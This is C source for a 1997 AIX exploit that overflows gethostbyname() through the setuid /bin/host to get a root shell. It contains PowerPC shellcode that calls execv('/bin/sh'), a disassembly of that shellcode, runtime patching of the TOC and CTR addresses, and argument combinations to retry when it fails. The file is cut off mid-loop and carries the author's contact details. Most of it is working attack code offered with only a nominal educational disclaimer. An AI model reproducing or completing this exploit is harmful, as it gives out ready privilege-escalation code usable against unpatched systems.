/* AIX 4.1 ,4.?, 3.? gethostbyname() and /bin/host exploit by Georgi Guninski --------------------------------------------------------------------------- Standard disclaimer This program is for educational purpose ONLY. Do not use it without permission. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski or any Internet provider bears NO responsibility for content or misuse of this program or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of this program is not Georgi Guninski's responsibility. -------------------------------------------------------------------------- I wrote and tested this program on AIX 4.1 for PowerPC 601 and 604 and it started a root shell on 5 machines. It exploits a buffer overflow in gethostbyname() (see IBM advisory) and the fact that /bin/host is +s. Probably it may be modified to work with rlogin,ping,traceroute and others. Possibly this hole may be exploited remotely. IBM has released patch for the problem. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! If the program gives you 'Segmentation fault' or 'Illegal instruction', then try at least the following arguments:(string length,offset,kludge1,kludge2) 78 40 1 1 78 40 1 0 78 40 0 0 78 40 0 1 If you get coredump, examine the registers. The higher 16 bits of TOC and IAR(CTR) should be the values, printed by the program (the address of execv() ). The last two arguments are added to correct some difference (because of carry?,cache? ???). Sorry for the lame coding. Compile with: cc -g test.c try: ./a.out 78 40 1 1 ./a.out 78 40 0 0 ./a.out 78 40 0 1 ./a.out 78 40 0 0 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Georgi Guninski Email: stgun@hotmail.com sgg@vmei.acad.bg guninski@linux2.vmei.acad.bg Tel: +359 2 774104 Suggestions,comments and offers are welcome! 11-Jan-97 */ #include #include /*Used only for disassembling*/ void sh2() { int junk[0x100]; int s[2]; int toc; int ctr; junk[0x100]=0x11; toc=0xf0192c48; ctr=0xd0024c0c; s[0]=0x2f62696e; s[1]=0x2f736800; execv(&s,0); } /*Used for testing*/ void buggy(char *s) { char a[4]; unsigned int junk[150]; strcpy(a,s); puts("Over"); if(junk[20]) puts("P"); } /*The program*/ main(int argc,char **argv) { unsigned int junk[300]; /*The code*/ unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x30632c48 , 0x90610440 , 0x3c60d002 , 0x30634c0c , 0x90610444 , 0x3c602f62 , 0x3063696e , 0x90610438 , 0x3c602f73 , 0x30636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; /* disassembly 7c0802a6 mfspr r0,LR 9421fbb0 stu SP,-1104(SP) --get some stack 90010458 st r0,1112(SP) 3c60f019 cau r3,r0,0xf019 --CTR changed at runtime 30632c48 ai r3,r3,11336 --CTR changed at runtime should be kludged 90610440 st r3,1088(SP) 3c60d002 cau r3,r0,0xd002 --TOC changed at runtime 30634c0c ai r3,r3,19468 --TOC changed at runtime should be kludged 90610444 st r3,1092(SP) 3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01' 3063696e ai r3,r3,26990 90610438 st r3,1080(SP) 3c602f73 cau r3,r0,0x2f73 30636801 ai r3,r3,26625 3863ffff addi r3,r3,-1 9061043c st r3,1084(SP) --terminate /bin/sh with 0 30610438 ai r3,SP,1080 7c842278 xor r4,r4,r4 --argv=NULL 80410440 lwz RTOC,1088(SP) --prepare to jump 80010444 lwz r0,1092(SP) --jump 7c0903a6 mtspr CTR,r0 4e800420 bctr --jump */ unsigned int buf[600]; unsigned int i,nop,mn; int max; unsigned int toc; unsigned int eco; unsigned int *pt; int carry1=1; int carry2=1; pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; if (argv[3]) carry1=atoi(argv[3]); if (argv[4]) carry2=atoi(argv[4]); max=atoi(argv[1]); if(max==0) max=78; mn=40; if(argv[2]) mn=atoi(argv[2]); *((unsigned short *)code +9)=(unsigned short) (toc & 0x0000ffff); *((unsigned short *)code +7)=carry1+(unsigned short) ((toc >> 16) & 0x0000ffff); /* 1+ because of CARRYFLAG? CACHE?*/ *((unsigned short *)code +15)=(unsigned short) (eco & 0x0000ffff); *((unsigned short *)code +13)=carry2+(unsigned short) ((eco >> 16) & 0x0000ffff); puts("Test AIX!"); puts("Discovered and coded by G.G."); printf("TOC:%0x,CTR:%0x\n",toc,eco); junk[50]=1; for(nop=0;nop